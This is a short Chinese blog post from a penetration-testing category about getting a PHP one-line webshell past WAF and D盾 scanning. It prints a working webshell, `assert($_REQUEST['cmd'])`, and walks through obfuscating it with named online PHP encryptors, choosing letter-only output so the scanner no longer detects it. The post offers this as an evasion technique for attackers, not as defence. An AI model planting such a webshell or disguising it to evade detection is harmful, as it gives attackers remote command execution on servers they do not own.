php一句话过waf的方法

作者:小俊 分类: 渗透测试 发布于:2020-3-26 13:35 ė15次浏览 60条评论
国内的一些加密 http://enphp.djunny.com/ 和 http://www.phpjm.net/

新思路php一句话过waf

新思路php一句话过waf

无需安装额外插件
这里就以 http://enphp.djunny.com/ 为例子吧, http://www.phpjm.net 的加密含有非 ANSI 字符会被 D盾 检测到
原始的一句话代码

<?php // shell.php assert($_REQUEST['cmd']); ?> 

新思路php一句话过waf

新思路php一句话过waf

在线加密一下

新思路php一句话过waf

混淆选择字母, 乱码可能会被 D盾 检测到
加密后的代码
shell_encode.php

新思路php一句话过waf

D盾 已经检测不出来了

新思路php一句话过waf

本文出自 XISEWBMS菜刀官方,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部